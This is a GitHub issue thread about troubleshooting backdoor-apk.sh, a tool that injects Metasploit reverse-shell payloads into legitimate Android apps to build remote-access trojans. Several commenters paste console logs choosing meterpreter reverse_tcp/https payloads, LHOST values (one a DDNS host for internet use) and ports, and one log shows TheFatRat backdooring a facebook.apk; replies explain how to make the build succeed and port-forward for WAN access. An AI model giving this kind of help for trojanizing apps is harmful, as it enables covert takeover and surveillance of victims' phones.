Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Failed to decompile RAT APK file when original APK is not copied to the backdoor-apk directory #62

Closed
BaraSec opened this issue Dec 23, 2016 · 14 comments
Labels

Comments

@BaraSec
Copy link

BaraSec commented Dec 23, 2016

Whatever APK i try, i get this error:

[*] Running backdoor-apk.sh v0.1.8 on Fri Dec 23 03:50:11 EST 2016
[+] Android payload options:

  1. meterpreter/reverse_http 4) shell/reverse_http
  2. meterpreter/reverse_https 5) shell/reverse_https
  3. meterpreter/reverse_tcp 6) shell/reverse_tcp
    [?] Please select an Android payload option: 2
    [?] Please enter an LHOST value: 192.168.1.103
    [?] Please enter an LPORT value: 2525
    [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
    [] Generating RAT APK file...done.
    [
    ] Decompiling RAT APK file...done.
    [!] Failed to decompile RAT APK file

and then it just quits!

@BaraSec
Copy link
Author

BaraSec commented Dec 23, 2016

Solved. Copying the APK file to the script directory solved the issue.
Thanks anyway.

@misterbee2856
Copy link

@BaraSec but i'm still failed sir..anyone can solved that..?

@misterbee2856
Copy link

[*] Running backdoor-apk.sh v0.1.8 on Sun Dec 25 20:59:12 HOVT 2016
[+] Android payload options:

  1. meterpreter/reverse_http 4) shell/reverse_http
  2. meterpreter/reverse_https 5) shell/reverse_https
  3. meterpreter/reverse_tcp 6) shell/reverse_tcp
    [?] Please select an Android payload option: 3
    [?] Please enter an LHOST value: boniw.ddns.net
    [?] Please enter an LPORT value: 6969
    [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
    [] Generating RAT APK file...done.
    [
    ] Decompiling RAT APK file...done.
    [*] Decompiling original APK file...done.
    [!] Failed to decompile original APK file
    root@drone:~/backdoor-apk/backdoor-apk#

@BaraSec
Copy link
Author

BaraSec commented Dec 25, 2016

copy the original APK file to the ~/backdoor-apk/backdoor-apk folder, and use that file to be backdoored.

@misterbee2856
Copy link

i'll try....thanks before sir...

@BaraSec
Copy link
Author

BaraSec commented Dec 25, 2016

You're welcome,
A feedback about my solution would be much appreciated :)

@misterbee2856
Copy link

i'm still try sir...cause i'm got error Failed to run proguard with specified configuration
hehe..i'm googling now to find the solustion...hehe...
can i set lhost using noip..? i want to try on WAN... or just can work on LAN..?

@BaraSec
Copy link
Author

BaraSec commented Dec 25, 2016

On WAN you need to port forward in your router.

@misterbee2856
Copy link

yes i has do it...

finally SOLVED Mr @BaraSec thanks for Your HELP and your attention... :) 👍

@BaraSec
Copy link
Author

BaraSec commented Dec 25, 2016

You're Welcome Sir :)

@dana-at-cp
Copy link
Owner

@BaraSec Glad you got it sorted. The original APK file does in fact need to be in the same directory where backdoor-apk.sh resides.

@dana-at-cp dana-at-cp changed the title [!] Failed to decompile RAT APK file Failed to decompile RAT APK file when original APK is not copied to the backdoor-apk directory Dec 27, 2016
@ghost
Copy link

ghost commented Jul 6, 2017

Hello have you tried using the backdoor-apk and have data the next error, [!] Failed to generate RAT APK file. I've already put the original APK in the backdoor-apk folder, backdoor-apk, and even then the error that I showed above, how can I fix this?

@shanmnukh
Copy link


/ | | ___ | | () __ __ _
| | | '
\ / _ / | |/ / | ' \ / \ | | |
| | | | / (| <| | | | | (
| | _ _ _
_|| ||_|_||__|| ||_/ | () () ()
|
_/
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::: Metasploit service is not running ::::::::::::::::::
resize: Time out occurred

     ____
    |    |
    |____|
   _|____|_       _____ _       _____     _   _____     _      
    /  ee\_      |_   _| |_ ___|   __|___| |_| __  |___| |_    
  .<     __O       | | |   | -_|   __| .'|  _|    -| .'|  _|
 /\ \.-.' \        |_| |_|_|___|__|  |___|_| |__|__|___|_|
J  \.|'.\/ \
| |_.|. | | |   [--]   Backdoor Creator for Remote Acces [--]
 \__.' .|-' /   [--]  Created by: Edo Maland (Screetsec) [--]
 L   /|o'--'\   [--]            Version: 1.9.5           [--]
 |  /\/\/\   \  [--]          Codename: Whistle          [--]  
 J /      \.__\ [--]   Follow me on Github: @Screetsec   [--]       J /      \.__\ [--]   Dracos Linux : @dracos-linux.org  [--]
 |/         /   [--]                                     [--]         \      .'\.  [--]     SELECT AN OPTION TO BEGIN:      [--]  [ ]===========================================================================[ ]

[ ] [ ]
[ ] ) ( ) ) ( ( ) [ ]
[ ] ( ( ( ( /( )\ ) ( /( ( /( )\ ) )\ ) ( /( ( [ ]
[ ] )\ )\ )\ )())(()/( )()) )()) (()/((()/( )()) )\ ) [ ]
[ ] (()(((()( ((() |(()\ /()) (()\ (()\ /())/())(()\ (()/( [ ]
[ ] () )_ )\ )___ | (()())_ (() (() ()) ()) (() /()) [ ]
[ ] | _ ) ()()((/ _|| |/ / | \ / _ \ / _ \ | _ | | | | |()) |[ ]
[ ] | _ \ / _ \ | (
' < | |) || (
) || () || / | | | .` | | ( |[ ]
[ ] |/ // _\ _| |_\ |/ _/ _/ |||| ||_| ___|[ ]
[ ]===========================================================================[ ]
[ ] Embed a Metasploit Payload in an original .apk files [ ]
[ ] This script is POC for injecting metasploit payload arbitary apk backdoor [ ]
[ ]===========================================================================[ ]

Cleaning Temp files
Done!

Your local IPV4 address is : 192.168.1.107
Your local IPV6 address is : fe80::c2ee:fbff:fedd:4be
Your public IP address is : 117.206.229.129
Your Hostname is : 3(NXDOMAIN

Set LHOST IP: 192.168.1.107

Set LPORT: 443

Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)

Path : root/TheFatRat/facebook.apk

File does not exist , make sure you write the right path of it .

Press [ENTER] key to try again .

Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)

Path : /root/TheFatRat/facebook.apk

+-------------------------------------------+
| [ 1 ] android/meterpreter/reverse_http |
| [ 2 ] android/meterpreter/reverse_https |
| [ 3 ] android/meterpreter/reverse_tcp |
| [ 4 ] android/shell/reverse_http |
| [ 5 ] android/shell/reverse_https |
| [ 6 ] android/shell/reverse_tcp |
+-------------------------------------------+

Choose Payload : 3

[ [ + [ +++ [ +++++++ [ ++++++++ [ +++++++++++ [ +++++++++++++++ [ ++++++++++++++++++ [ ++++++++++++++++++++++ [ ++++++++++++++++++++++++ [ ++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
+------------------------------+
| [ 1 ] Use Backdoor-apk 0.2.2 |
| [ 2 ] Use old Fatrat method |
+------------------------------+

Select Tool to create apk : 2

[ [ [ ++++ [ ++++++++ [ +++++++++++ [ +++++++++++++ [ ++++++++++++++++++ [ +++++++++++++++++++++ [ ++++++++++++++++++++++++ [ +++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$
Generate Backdoor
+------------++-------------------------++-----------------------+
| Name || Descript || Your Input
+------------++-------------------------++-----------------------+
| LHOST || The Listen Addres || 192.168.1.107
| LPORT || The Listen Ports || 443
| OUTPUTNAME || The Filename output || app_backdoored.apk
| PAYLOAD || Payload To Be Used || android/meterpreter/reverse_tcp
+------------++-------------------------++-----------------------+
resize: unknown character, exiting.

     ____
    |    |
    |____|
   _|____|_       _____ _       _____     _   _____     _      
    /  ee\_      |_   _| |_ ___|   __|___| |_| __  |___| |_    
  .<     __O       | | |   | -_|   __| .'|  _|    -| .'|  _|        /\ \.-.' \        |_| |_|_|___|__|  |___|_| |__|__|___|_|
J  \.|'.\/ \                                                       | |_.|. | | |   [--]   Backdoor Creator for Remote Acces [--]
 \__.' .|-' /   [--]  Created by: Edo Maland (Screetsec) [--]
 L   /|o'--'\   [--]            Version: 1.9.5           [--]
 |  /\/\/\   \  [--]          Codename: Whistle          [--]       J /      \.__\ [--]   Follow me on Github: @Screetsec   [--]
 J /      \.__\ [--]   Dracos Linux : @dracos-linux.org  [--]
 |/         /   [--]                                     [--]
   \      .'\.  [--]     SELECT AN OPTION TO BEGIN:      [--]      ____)_/\_(___\. [--] .___________________________________[--]

(./ _.)'_.-----------------------------------------/
root@kali:# ls
Mnemonics.apk apk-embed-payload.rb hackpack med.apk
TheFatRat backdoor-apk lazykali.sh spade
root@kali:
# cd backdoor-apk
root@kali:/backdoor-apk# cd backdoor-apk
root@kali:
/backdoor-apk/backdoor-apk# ls
Rat.apk backdoor-apk.rc cleanup.sh java payload third-party
android.pro backdoor-apk.sh facebook.apk lists run.log
root@kali:~/backdoor-apk/backdoor-apk# ./backdoor-apk.sh ./facebook.apk
________
/ ______
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||
||||| AAA AAA PPP PPP KKK KKK
|| _ o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||
||
||| AAA AAA PPP KKK KKK
|||| AAA AAA PPP KKK KKK
/

________|
|____________________________________
/
|
| Dana James Traversie

[*] Running backdoor-apk.sh v0.2.2 on Mon Jul 17 12:53:03 UTC 2017
[+] Android payload options:

  1. meterpreter/reverse_http 4) shell/reverse_http
  2. meterpreter/reverse_https 5) shell/reverse_https
  3. meterpreter/reverse_tcp 6) shell/reverse_tcp
    [?] Please select an Android payload option: 3
    [?] Please enter an LHOST value: 192.168.1.107
    [?] Please enter an LPORT value: 443
    [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
    [] Generating RAT APK file...done.
    [
    ] Decompiling RAT APK file...

@shanmnukh
Copy link

Atruck here help

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

4 participants